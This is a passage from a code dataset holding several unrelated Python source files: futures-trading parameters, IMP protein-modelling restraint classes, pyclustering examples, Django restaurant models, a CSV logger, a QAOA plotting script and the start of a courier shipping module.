20\n \n elif self.m.ticker_code() == \"YM\":\n self.tick_price = 1\n self.price_precision = 2\n self.dollar_multiplier = 20\n \n elif self.m.ticker_code() == \"CL\":\n self.tick_price = 0.01\n self.price_precision = 2\n self.dollar_multiplier = 1000\n \n elif self.m.ticker_code() == \"NG\":\n self.tick_price = 0.001\n self.price_precision = 3\n self.dollar_multiplier = 10000\n \n elif self.m.ticker_code() == \"GC\":\n self.tick_price = 0.10\n self.price_precision = 2\n self.dollar_multiplier = 100\n \n elif self.m.ticker_code() == \"HG\":\n self.tick_price = 0.0005\n self.price_precision = 4\n self.dollar_multiplier = 5000\n \n elif self.m.ticker_code() == \"SI\":\n self.tick_price = 0.005\n self.price_precision = 3\n self.dollar_multiplier = 5000\n \n elif self.m.ticker_code() == \"EU\":\n self.tick_price = 0.00005\n self.price_precision = 5\n self.dollar_multiplier = 125000\n \n elif self.m.ticker_code() == \"JP\":\n self.tick_price = 0.0000005\n self.price_precision = 7\n self.dollar_multiplier = 12500000\n \n elif self.m.ticker_code() == \"ZB\":\n self.tick_price = 0.03125\n self.price_precision = 5\n self.dollar_multiplier = 1000\n \n elif self.m.ticker_code() == \"ZN\":\n self.tick_price = 0.015625\n self.price_precision = 6\n self.dollar_multiplier = 1000\n \n elif self.m.ticker_code() == \"ZC\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 50\n \n elif self.m.ticker_code() == \"ZS\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 50\n\n self.max_breaking_price_changes_list = 50\n self.min_breaking_price_changes_list = 20\n\n\n # performance parameters with options\n # if parameter is set None, means that should be resolved in the specific part of the code, probably in Decision class.\n # if parameter is set 'calc', it is calculated in the property part\n # first value of tuple is default value\n def set_options_and_defaults(self):\n self.primary_look_back_time_options = (3600, 7200, 1800, 900) # secs # ideal for ES, 600-900 for all others\n self.density_division_options = (10, 5)\n \n # Stop time\n self.breaking_stop_time_options = (60, 20, 40, 80, 120) # secs\n self.speeding_stop_time_options = (10, 5, 20, 30) # secs\n\n # Breaking\n self._min_breaking_price_changes_options = (7, 3, 15, 'calc') # times\n self.breaking_up_down_ratio_options = (1.0, 1.5, 2.0)\n self.min_breaking_range_options = (4, 2, 6)\n\n # Speeding\n self.speeding_time_options = (5, 10, 20) # secs\n self.time_speeding_points_length_options = (4, 3, 6)\n self.speed_min_max_win_loose_ticks_options = ((2, 6), (3, 6), (4, 10))\n\n # Stop values\n self.reached_first_target_break_options = (1, 2)\n self.made_two_break_options = (1, 2)\n self.min_max_loose_ticks_options = ((1, 3), (2, 5)) # could replace speed_min_max_win_loose_ticks_options\n self.reversal_addition_break_options = (1, 2, 0)\n\n # Variety\n self._max_winning_ticks_options = (4, 1, 2) # With 1 it is mostly a market maker\n self.reduce_score_rate_on_price_data_length_options = ((150, 350, 0.75), (150, 300, 0.50), None, None)\n self.trade_initiation_ticks_options = (1, 0)\n\n # Scores\n self.breaking_price_changes_score_options = (3, 1, 0)\n self.duration_score_options = (1, 2, 0)\n self.in_line_score_options = (1, 2, 0)\n self.trend_two_score_options = (1, 2, 0)\n self.in_out_density_direction_score_options = (1, 2, 0)\n self.advantage_score_options = (3, 1, 0)\n\n # Set defaults (default value is the first of the options)\n current_vars = dict(vars(self))\n for variable, value in 
current_vars.items():\n if variable[-8:] == '_options':\n setattr(self, variable.replace('_options', ''), value[0])\n\n\n def randomize(self):\n for variable, value in vars(self).items():\n if variable[-8:] == '_options':\n setattr(self, variable.replace('_options', ''), random.choice(value))\n self.id = None # without any id, ParamsDb will assign a new one and save it as new\n\n\n @property\n def min_breaking_price_changes(self):\n if self._min_breaking_price_changes == 'calc':\n if len(self.m.breaking.price_changes_list) < self.min_breaking_price_changes_list:\n return self.default('_min_breaking_price_changes')\n else:\n try:\n return round(statistics.median(self.m.breaking.price_changes_list) * 1.5)\n except statistics.StatisticsError:\n return self.default('_min_breaking_price_changes')\n else:\n return self._min_breaking_price_changes\n\n\n @property\n def max_winning_ticks(self):\n if self._max_winning_ticks == 'calc':\n if len(self.m.results.data) < 20:\n return self.default('_max_winning_ticks')\n else:\n try:\n return statistics.mode(r.fantasy_pnl for r in self.m.results.data)\n except statistics.StatisticsError:\n return self.default('_max_winning_ticks')\n else:\n return self._max_winning_ticks\n\n\n def default(self, attr):\n return getattr(self, attr + '_options')[0]\n\n\n def attach_last_result(self, last=None):\n self.last_result = {}\n self.last_result['average_pnl'] = self.m.dollars(self.m.results.average_pnl(last))\n self.last_result['nr_of_winners'] = self.m.results.nr_of_wl('winners', last)\n self.last_result['nr_of_loosers'] = self.m.results.nr_of_wl('loosers', last)\n self.last_result['underlying'] = f\"{self.m.ticker_code()}_{time.strftime('%Y-%m-%d--%H-%M', time.localtime(self.m.last_time()))}\"\n\n\n def state_str(self):\n output = \" PARAMETERS:\\n\"\n output += f\" id: {self.id}\\n\"\n for variable, value in vars(self).items():\n if variable[-8:] == '_options':\n output += f\" {variable.replace('_options', '')}: {getattr(self, variable.replace('_options', ''))}\\n\"\n return output","repo_name":"bsampietro/algo_trading","sub_path":"models/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"2088955919","text":"\"\"\"@namespace IMP.pmi.restraints\n Classes to handle different kinds of restraints.\n\nPMI restraints generally wrap IMP restraints. Typical features in PMI restraints are:\n - Easy setup: for example, you can usually create one with a PMI [Molecule](@ref IMP::pmi::topology::Molecule) or a slice from one.\n - Fast setup from data files. 
For example you can set up the [CrossLinkingMassSpectrometryRestraint](@ref IMP::pmi::restraints::crosslinking::CrossLinkingMassSpectrometryRestraint) by reading in a cross-link file into a [database](@ref IMP::pmi::io::crosslink::CrossLinkDataBase).\n - Useful output: reporting functions which are put into log files when running [ReplicaExchange](@ref IMP::pmi::macros::ReplicaExchange).\n\"\"\" # noqa: E501\n\nimport IMP\nimport IMP.pmi\nimport IMP.pmi.tools\n\n\nclass RestraintBase(object):\n _include_in_rmf = False\n\n \"\"\"Base class for PMI restraints, which wrap `IMP.Restraint`(s).\"\"\"\n\n def __init__(self, m, name=None, label=None, weight=1.,\n restraint_set_class=IMP.RestraintSet):\n \"\"\"Constructor.\n @param m The model object\n @param name The name of the primary restraint set that is wrapped.\n This is used for outputs and particle/restraint names\n and should be set by the child class.\n @param label A unique label to be used in outputs and\n particle/restraint names.\n @param weight The weight to apply to all internal restraints.\n @param restraint_set_class The class to use for the restraint set\n \"\"\"\n self.model = m\n self.restraint_sets = []\n self._label_is_set = False\n self.weight = weight\n self._label = None\n self._label_suffix = \"\"\n self.set_label(label)\n\n if not name:\n self.name = self.__class__.__name__\n else:\n self.name = str(name)\n\n self.rs = self._create_restraint_set(name=None,\n cls=restraint_set_class)\n\n def set_label(self, label):\n \"\"\"Set the unique label used in outputs and particle/restraint names.\n @param label Label\n \"\"\"\n if self._label_is_set:\n raise ValueError(\"Label has already been set, or restraint has \"\n \"already been added to model.\")\n if not label:\n self._label = \"\"\n self._label_suffix = \"\"\n else:\n self._label = str(label)\n self._label_suffix = \"_\" + self._label\n self._label_is_set = True\n\n @property\n def label(self):\n return self._label\n\n def set_weight(self, weight):\n \"\"\"Set the weight to apply to all internal restraints.\n @param weight Weight\n \"\"\"\n self.weight = weight\n for rs in self.restraint_sets:\n rs.set_weight(self.weight)\n\n def add_to_model(self):\n \"\"\"Add the restraint to the model.\"\"\"\n self._label_is_set = True\n for rs in self.restraint_sets:\n IMP.pmi.tools.add_restraint_to_model(\n self.model, rs, add_to_rmf=self._include_in_rmf)\n\n def evaluate(self):\n \"\"\"Evaluate the score of the restraint.\"\"\"\n self._label_is_set = True\n return self.weight * self.rs.unprotected_evaluate(None)\n\n def get_restraint_set(self):\n \"\"\"Get the primary restraint set.\"\"\"\n self._label_is_set = True\n return self.rs\n\n def get_restraint(self):\n \"\"\"Get the primary restraint set. 
Identical to `get_restraint_set`.\"\"\"\n return self.get_restraint_set()\n\n def get_restraint_for_rmf(self):\n \"\"\"Get the restraint for visualization in an RMF file.\"\"\"\n self._label_is_set = True\n return self.rs\n\n def get_particles_to_sample(self):\n \"\"\"Get any created particles which should be sampled.\"\"\"\n self._label_is_set = True\n return {}\n\n def get_output(self):\n \"\"\"Get outputs to write to stat files.\"\"\"\n output = {}\n score = self.evaluate()\n output[\"_TotalScore\"] = str(score)\n\n suffix = \"_Score\" + self._label_suffix\n for rs in self.restraint_sets:\n out_name = rs.get_name() + suffix\n output[out_name] = str(\n self.weight * rs.unprotected_evaluate(None))\n return output\n\n def _create_restraint_set(self, name=None, cls=IMP.RestraintSet):\n \"\"\"Create ``IMP.RestraintSet``.\"\"\"\n if not name:\n name = self.name\n else:\n name = self.name + \"_\" + str(name)\n rs = cls(self.model, name)\n rs.set_weight(self.weight)\n self.restraint_sets.append(rs)\n rs.set_was_used(True)\n return rs\n\n\nclass _RestraintNuisanceMixin(object):\n\n \"\"\"Mix-in to add nuisance particle creation functionality to restraint.\n\n This class must only be inherited if also inheriting\n IMP.pmi.restraints.RestraintBase.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(_RestraintNuisanceMixin, self).__init__(*args, **kwargs)\n self.sampled_nuisances = {}\n self.nuisances = {}\n\n def _create_nuisance(self, init_val, min_val, max_val, max_trans, name,\n is_sampled=False):\n \"\"\"Create nuisance particle.\n @param init_val Initial value of nuisance\n @param min_val Minimum value of nuisance\n @param max_val Maximum value of nuisance\n @param max_trans Maximum move to apply to nuisance\n @param name Name of particle\n @param is_sampled Nuisance is a sampled particle\n @see IMP.pmi.tools.SetupNuisance\n \"\"\"\n nuis = IMP.pmi.tools.SetupNuisance(\n self.model, init_val, min_val, max_val,\n isoptimized=is_sampled).get_particle()\n nuis_name = self.name + \"_\" + name\n nuis.set_name(nuis_name)\n self.nuisances[nuis_name] = nuis\n if is_sampled:\n self.sampled_nuisances[nuis_name] = (nuis, max_trans)\n return nuis\n\n def get_particles_to_sample(self):\n \"\"\"Get any created particles which should be sampled.\"\"\"\n ps = super(_RestraintNuisanceMixin, self).get_particles_to_sample()\n for name, (nuis, max_trans) in self.sampled_nuisances.items():\n ps[\"Nuisances_\" + name + self._label_suffix] = ([nuis], max_trans)\n return ps\n\n def get_output(self):\n \"\"\"Get outputs to write to stat files.\"\"\"\n output = super(_RestraintNuisanceMixin, self).get_output()\n for nuis_name, nuis in self.nuisances.items():\n output[nuis_name + self._label_suffix] = str(nuis.get_scale())\n return output\n\n\nclass _NuisancesBase(object):\n\n \"\"\"This base class is used to provide nuisance setup and interface\n for the ISD cross-link restraints\"\"\"\n\n sigma_dictionary = {}\n psi_dictionary = {}\n\n def create_length(self):\n \"\"\"Create a nuisance on the length of the cross-link.\"\"\"\n lengthinit = 10.0\n self.lengthissampled = True\n lengthminnuis = 0.0000001\n lengthmaxnuis = 1000.0\n lengthmin = 6.0\n lengthmax = 30.0\n length = IMP.pmi.tools.SetupNuisance(self.m, lengthinit,\n lengthminnuis, lengthmaxnuis,\n self.lengthissampled\n ).get_particle()\n self.rslen.add_restraint(\n IMP.isd.UniformPrior(\n self.m,\n length,\n 1000000000.0,\n lengthmax,\n lengthmin))\n\n def create_sigma(self, resolution):\n \"\"\"Create a nuisance on the structural uncertainty.\"\"\"\n if 
isinstance(resolution, str):\n sigmainit = 2.0\n else:\n sigmainit = resolution + 2.0\n self.sigmaissampled = True\n sigmaminnuis = 0.0000001\n sigmamaxnuis = 1000.0\n sigmamin = 0.01\n sigmamax = 100.0\n sigmatrans = 0.5\n sigma = IMP.pmi.tools.SetupNuisance(self.m, sigmainit, sigmaminnuis,\n sigmamaxnuis, self.sigmaissampled\n ).get_particle()\n self.sigma_dictionary[resolution] = (\n sigma,\n sigmatrans,\n self.sigmaissampled)\n self.rssig.add_restraint(\n IMP.isd.UniformPrior(\n self.m,\n sigma,\n 1000000000.0,\n sigmamax,\n sigmamin))\n # self.rssig.add_restraint(IMP.isd.JeffreysRestraint(self.sigma))\n\n def get_sigma(self, resolution):\n \"\"\"Get the nuisance on structural uncertainty.\"\"\"\n if resolution not in self.sigma_dictionary:\n self.create_sigma(resolution)\n return self.sigma_dictionary[resolution]\n\n def create_psi(self, value):\n \"\"\"Create a nuisance on the inconsistency.\"\"\"\n if isinstance(value, str):\n psiinit = 0.5\n else:\n psiinit = value\n self.psiissampled = True\n psiminnuis = 0.0000001\n psimaxnuis = 0.4999999\n psimin = 0.01\n psimax = 0.49\n psitrans = 0.1\n psi = IMP.pmi.tools.SetupNuisance(self.m, psiinit,\n psiminnuis, psimaxnuis,\n self.psiissampled).get_particle()\n self.psi_dictionary[value] = (\n psi,\n psitrans,\n self.psiissampled)\n self.rspsi.add_restraint(\n IMP.isd.UniformPrior(\n self.m,\n psi,\n 1000000000.0,\n psimax,\n psimin))\n self.rspsi.add_restraint(IMP.isd.JeffreysRestraint(self.m, psi))\n\n def get_psi(self, value):\n \"\"\"Get the nuisance on the inconsistency.\"\"\"\n if value not in self.psi_dictionary:\n self.create_psi(value)\n return self.psi_dictionary[value]\n","repo_name":"salilab/pmi","sub_path":"pyext/src/restraints/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9974,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"6"} +{"seq_id":"20519442570","text":"\"\"\"!\r\n\r\n@brief Examples of usage and demonstration of abilities of SYNC-SOM algorithm in cluster analysis.\r\n\r\n@authors Andrei Novikov (pyclustering@yandex.ru)\r\n@date 2014-2020\r\n@copyright BSD-3-Clause\r\n\r\n\"\"\"\r\n\r\nfrom random import random\r\n\r\nfrom pyclustering.cluster import cluster_visualizer\r\nfrom pyclustering.cluster.syncsom import syncsom\r\n\r\nfrom pyclustering.samples.definitions import SIMPLE_SAMPLES\r\nfrom pyclustering.samples.definitions import FCPS_SAMPLES\r\n\r\nfrom pyclustering.utils import read_sample, draw_dynamics\r\nfrom pyclustering.utils import timedcall\r\n\r\n\r\ndef template_clustering(file, map_size, radius, sync_order = 0.999, show_dyn = False, show_layer1 = False, show_layer2 = False, show_clusters = True):\r\n # Read sample\r\n sample = read_sample(file)\r\n\r\n # Create network\r\n network = syncsom(sample, map_size[0], map_size[1], radius)\r\n \r\n # Run processing\r\n (ticks, (dyn_time, dyn_phase)) = timedcall(network.process, show_dyn, sync_order)\r\n print(\"Sample: \", file, \"\\t\\tExecution time: \", ticks, \"\\n\")\r\n \r\n # Show dynamic of the last layer.\r\n if show_dyn is True:\r\n draw_dynamics(dyn_time, dyn_phase, x_title = \"Time\", y_title = \"Phase\", y_lim=[0, 3.14])\r\n \r\n if show_clusters is True:\r\n clusters = network.get_som_clusters()\r\n \r\n visualizer = cluster_visualizer()\r\n visualizer.append_clusters(clusters, network.som_layer.weights)\r\n visualizer.show()\r\n \r\n # Show network stuff.\r\n if show_layer1 is True:\r\n network.show_som_layer()\r\n \r\n if show_layer2 is True:\r\n 
network.show_sync_layer()\r\n \r\n if show_clusters is True:\r\n clusters = network.get_clusters()\r\n \r\n visualizer = cluster_visualizer()\r\n visualizer.append_clusters(clusters, sample)\r\n visualizer.show()\r\n\r\ndef cluster_simple1():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [4, 4], 1.0, 0.999, True, True, True, True)\r\n\r\ndef cluster_simple1_as_som():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [1, 2], 1.0, 0.999, True, True, True, True)\r\n \r\ndef cluster_simple2():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [4, 4], 1.0, 0.999, True, True, True, True)\r\n\r\ndef cluster_simple2_as_som():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [1, 3], 1.0, 0.999, True, True, True, True)\r\n\r\ndef cluster_simple3():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [5, 5], 1.0, 0.999, True, True, True, True)\r\n \r\ndef cluster_simple4():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [5, 5], 1.0, 0.999, True, True, True)\r\n \r\ndef cluster_simple5():\r\n template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [5, 5], 1.0, 0.999, True, True, True)\r\n\r\ndef cluster_lsun():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [9, 9], 0.45, 0.999, True, True, True)\r\n \r\ndef cluster_target():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [9, 9], 0.9, 0.999, True, True, True)\r\n\r\ndef cluster_two_diamonds():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [10, 10], 0.15, 0.999, True, True, True)\r\n\r\ndef cluster_wing_nut():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [10, 10], 0.25, 0.999, True, True, True)\r\n\r\ndef cluster_chainlink():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [10, 10], 0.5, 0.999, True, True, True)\r\n\r\ndef cluster_hepta():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [7, 7], 1.0, 0.999, True, True, True)\r\n\r\ndef cluster_tetra():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [7, 7], 0.4, 0.998, True, True, True)\r\n\r\ndef experiment_execution_time():\r\n template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [4, 4], 0.45, 0.999, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [4, 4], 0.9, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [4, 4], 0.25, 0.999, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [4, 4], 0.5, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [4, 4], 0.4, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [6, 6], 1.0, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [4, 4], 0.15, 0.998, False, False, False, False)\r\n template_clustering(FCPS_SAMPLES.SAMPLE_ATOM, [4, 4], 15, 0.998, False, False, False, False)\r\n\r\n\r\ndef experiment_execution_one_cluster_dependence(layer_first_size, radius, order):\r\n print(\"Experiment: map size =\", layer_first_size[0] * layer_first_size[1], \"radius =\", radius, \"order =\", order)\r\n cluster_sizes = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150]\r\n \r\n for cluster_size in cluster_sizes:\r\n # generate data sets\r\n dataset = []\r\n dataset += [ [random(), random()] for _ in range(cluster_size) ]\r\n \r\n general_value = 0.0\r\n amount_attempt = 5\r\n for _ in range(amount_attempt):\r\n network = syncsom(dataset, layer_first_size[0], layer_first_size[1], radius)\r\n (ticks, (dyn_time, dyn_phase)) = timedcall(network.process, False, order)\r\n general_value += 
ticks\r\n \r\n print(\"Sample: \", cluster_size, \"\\t\\tExecution time: \", general_value / float(amount_attempt))\r\n \r\n print(\"\\n\")\r\n\r\n\r\ncluster_simple1()\r\ncluster_simple1_as_som()\r\ncluster_simple2()\r\ncluster_simple2_as_som()\r\ncluster_simple3()\r\ncluster_simple4()\r\ncluster_simple5()\r\ncluster_lsun()\r\ncluster_target()\r\ncluster_two_diamonds()\r\ncluster_chainlink()\r\ncluster_hepta()\r\ncluster_tetra()\r\n\r\nexperiment_execution_time()\r\n\r\nexperiment_execution_one_cluster_dependence([5, 5], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([6, 6], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([7, 7], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([8, 8], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([9, 9], 0.6, 0.998)\r\nexperiment_execution_one_cluster_dependence([10, 10], 0.6, 0.998)\r\n","repo_name":"annoviko/pyclustering","sub_path":"pyclustering/cluster/examples/syncsom_examples.py","file_name":"syncsom_examples.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":1113,"dataset":"github-code","pt":"6"} +{"seq_id":"72174130749","text":"from django.db import models\nfrom accounts.models import User\n\nclass Cuisine(models.Model):\n \"\"\"\n Model for cuisine.\n\n Attributes:\n name (str): The name of the cuisine.\n \"\"\"\n\n name = models.CharField(max_length=100)\n\n def __str__(self):\n \"\"\"\n Returns a string representation of the cuisine.\n\n Returns:\n str: The name of the cuisine.\n \"\"\"\n return self.name\n\nclass Restaurant(models.Model):\n \"\"\"\n Model for a restaurant.\n\n Attributes:\n restaurant_manager (User): The manager of the restaurant.\n restaurant_name (str): The name of the restaurant.\n restaurant_phone (str): The phone number of the restaurant.\n restaurant_status (int): The status of the restaurant (choices defined in RESTAURANT_STATUS).\n cuisines (list): The cuisines offered by the restaurant.\n opening_time (Time): The opening time of the restaurant.\n closing_time (Time): The closing time of the restaurant.\n restaurant_address (str): The address of the restaurant.\n restaurant_state (str): The state where the restaurant is located.\n restaurant_city (str): The city where the restaurant is located.\n restaurant_pin_code (str): The pin code of the restaurant's location.\n latitude (float): The latitude of the restaurant's location.\n longitude (float): The longitude of the restaurant's location.\n \"\"\"\n\n OPENED = 1\n CLOSED = 2\n\n RESTAURANT_STATUS = (\n (OPENED, 'Opened'),\n (CLOSED, 'Closed'),\n )\n\n class Meta:\n verbose_name = 'restaurant'\n verbose_name_plural = 'restaurants'\n\n restaurant_manager = models.OneToOneField(User, on_delete=models.CASCADE)\n restaurant_name = models.CharField(max_length=30, blank=False)\n restaurant_phone = models.CharField(max_length=10, null=False, blank=False)\n restaurant_status = models.PositiveSmallIntegerField(choices=RESTAURANT_STATUS, default=1)\n cuisines = models.ManyToManyField(Cuisine, blank=True)\n opening_time = models.TimeField()\n closing_time = models.TimeField()\n\n restaurant_address = models.CharField(max_length=250, blank=True, null=True)\n restaurant_state = models.CharField(max_length=15, blank=True, null=True)\n restaurant_city = models.CharField(max_length=15, blank=True, null=True)\n restaurant_pin_code = models.CharField(max_length=6, blank=True, null=True)\n\n latitude = models.DecimalField(max_digits=9, decimal_places=6)\n longitude = 
models.DecimalField(max_digits=9, decimal_places=6)\n\n    def __str__(self):\n        \"\"\"\n        Returns a string representation of the restaurant.\n\n        Returns:\n            str: The name of the restaurant.\n        \"\"\"\n        return self.restaurant_name\n\nclass Menu(models.Model):\n    \"\"\"\n    Model for a menu item.\n\n    Attributes:\n        restaurant (Restaurant): The restaurant to which this menu item belongs.\n        item (str): The name of the menu item.\n        price (int): The price of the menu item.\n    \"\"\"\n\n    restaurant = models.ForeignKey(Restaurant, on_delete=models.CASCADE)\n    item = models.CharField(max_length=30)\n    price = models.PositiveSmallIntegerField()\n\n    def __str__(self):\n        \"\"\"\n        Returns a string representation of the menu item.\n\n        Returns:\n            str: The name of the menu item.\n        \"\"\"\n        return self.item\n","repo_name":"akshay-toshniwal/food-delivery-backend","sub_path":"restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"18525418245","text":"import time\n\nLOG = {'tmstamp':[]}\n\nwith open('log.csv','w') as f:\n    f.write('tmstamp,mpu_6050,stc_3100,photo,antenna\\n')\n\ndef log(dct):\n    global LOG\n    LOG['tmstamp'].append(time.time())\n    for k, v in dct.items():\n        if k not in LOG:\n            LOG[k] = [v]\n        else:\n            LOG[k].append(v)\n    if len(LOG.keys()) > 1:\n        with open('log.csv','a') as f:\n            string = ''\n            for k,v in LOG.items():\n                string += '\"' + str(v[-1]) + '\"' + ','\n            # str.rstrip returns a new string; drop the trailing comma\n            string = string.rstrip(',')\n            string += '\\n'\n            f.write(string)","repo_name":"marius-ne/AQUIS","sub_path":"python/architecture/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"4556541405","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul  3 09:11:08 2020\n\n@author: joost\n\"\"\"\n\nimport numpy as np\nfrom data_load import load_csv\nimport matplotlib.pyplot as plt\nfrom GW import goemans_williamson\n\n# fit an exponential decay in p, or in the square root of p\nSQR = True\nplt.figure()\np_max = 8\ngraph_weight = 'weighted'\ncolors = [\"tab:blue\",\"tab:orange\",\"tab:green\",\"tab:red\",\"tab:purple\",\"tab:pink\",\"tab:cyan\"]\n\n\nfor c,n in enumerate([8,10,12,14,16]):\n    # loading dataframe\n    pre = \"data_trim/data_trim_3-regular_\"\n    post =\".csv\"\n    filename = graph_weight+\"_INT_\"+str(n)\n    df = load_csv(pre+filename+post);\n    \n    r_sum = np.zeros(p_max)\n    r_GW = 0\n    label = True\n    \n    # looping over the different graphs\n    for k,i in enumerate(range(0,len(df),p_max)): \n        print(k,i)\n        Fp = np.array([df['Fp'][i+j] for j in range(p_max)])\n        Cmax = np.array([df['Cmax'][i+j] for j in range(p_max)])\n        \n        G = df['graph'][i]\n        \n        r = Fp/Cmax\n        r_GW += np.mean([goemans_williamson(G) for i in range(10)])/Cmax[0]\n        r_sum += r\n        \n    xticks = np.arange(1,p_max+1)\n    r_mean = r_sum/len(range(0,len(df),p_max))\n    r_GW = r_GW/len(range(0,len(df),p_max))\n    \n    # Mean, including a fit\n    from scipy import optimize\n    def test_func(p, a, b):\n        if not SQR:\n            return a * np.exp(-p / b)\n        if SQR:\n            return a * np.exp(-np.sqrt(p / b))\n    \n    if not SQR:\n        label = r'$\\alpha e^{-p/p_0}$'\n    if SQR:\n        label = r'$\\alpha e^{-\\sqrt{p/p_0}}$'\n    \n    \n    params, params_covariance = optimize.curve_fit(test_func, xticks, 1-r_mean,\n                                               p0=[0.8, 2])\n    plt.yscale(\"log\")\n    plt.plot(xticks,1-r_mean, linestyle = 'None', color = colors[c], marker = 'o', label = 'n = '+str(n))\n    plt.hlines(1-r_GW, 1,p_max, linestyle = 'dashed', color = colors[c])#, label = 
r'$1-r_{GW}$ n = '+str(n))\n plt.plot(xticks,test_func(xticks,params[0],params[1]), color = colors[c], linestyle = 'solid')\n plt.grid(True,which=\"both\", ls=\"-\")\n \nplt.hlines(1-0.878, 1,p_max,colors='coral', linestyles = 'dotted', label = 'GW bound')\nplt.ylabel(r'$1-r$')\nplt.xlabel('p')\nplt.legend()\nplt.show()","repo_name":"soosub/bsc-thesis","sub_path":"Implementation/NewPlan/plots/data_analysis_3-regular_r-trends_system-size.py","file_name":"data_analysis_3-regular_r-trends_system-size.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44870073076","text":"#!/usr/bin/python3\n\n# Process all the 4 text files i.e. james.txt, juile.txt, mikey.txt, sarah.txt\n\ndef main():\n \n sarah = []\n \n try:\n sarah = get_coach_data('sarah.txt')\n \n print(sarah['Name'] + \"'s fastest times are: \" + sarah['Times'])\n except IOError:\n print(\"Error\")\n\n# Sanitize the given string and replace ':' and '-' with '.'\ndef sanitize(time_string):\n if '-' in time_string:\n splitter = '-'\n elif ':' in time_string:\n splitter= ':'\n else:\n return time_string\n \n (mins, secs) = time_string.split(splitter)\n \n return (mins + '.' + secs)\n\n# Read the file data and split it and return the array\ndef get_coach_data(file_name):\n try:\n with open(file_name) as file:\n data = file.readline()\n temp = (data.strip().split(','))\n return {'Name': temp.pop(0),\n 'DOB': temp.pop(0),\n 'Times': str(sorted(set([sanitize(t) for t in temp]))[0:3])\n }\n except IOError as error:\n print('File Error: ' + str(error))\n return(None)\n\nif __name__ == '__main__' : main()\n","repo_name":"sandeepgholve/Python_Programming","sub_path":"HeadFirstExamples/06_custom_data_objects/process_data8_use_dictionary.py","file_name":"process_data8_use_dictionary.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25069125695","text":"from typing import List, Tuple\nfrom ics_courier_lib.services import (\n AddressInfo,\n ArrayOfPieceInfo,\n Authenticate,\n CreateShipment,\n PackageInfo,\n PieceInfo,\n ArrayOfString,\n CreateShipmentResponse,\n)\nfrom purplship.core.models import (\n Documents,\n Message,\n ShipmentRequest,\n ShipmentDetails,\n)\nfrom purplship.core.utils import (\n create_envelope,\n Serializable,\n Element,\n Envelope,\n XP,\n)\nfrom purplship.core.units import Packages, Options\nfrom purplship.providers.ics_courier.error import parse_error_response\nfrom purplship.providers.ics_courier.utils import Settings\nfrom purplship.providers.ics_courier.units import Service, Option\n\n\ndef parse_shipment_response(\n response: Element, settings: Settings\n) -> Tuple[ShipmentDetails, List[Message]]:\n package = XP.find(\"PackageID\", response, ArrayOfString, first=True)\n label = XP.find(\"label\", response, first=True)\n details = (\n _extract_details((package.string[0], str(label.text)), settings)\n if getattr(package, \"string\", [None])[0] is not None\n else None\n )\n\n return details, parse_error_response(response, settings)\n\n\ndef _extract_details(response: Tuple[str, str], settings: Settings) -> ShipmentDetails:\n package_id, label = response\n\n return ShipmentDetails(\n carrier_id=settings.carrier_id,\n carrier_name=settings.carrier_name,\n tracking_number=package_id,\n shipment_identifier=package_id,\n docs=Documents(label=label),\n )\n\n\ndef shipment_request(\n payload: ShipmentRequest, settings: 
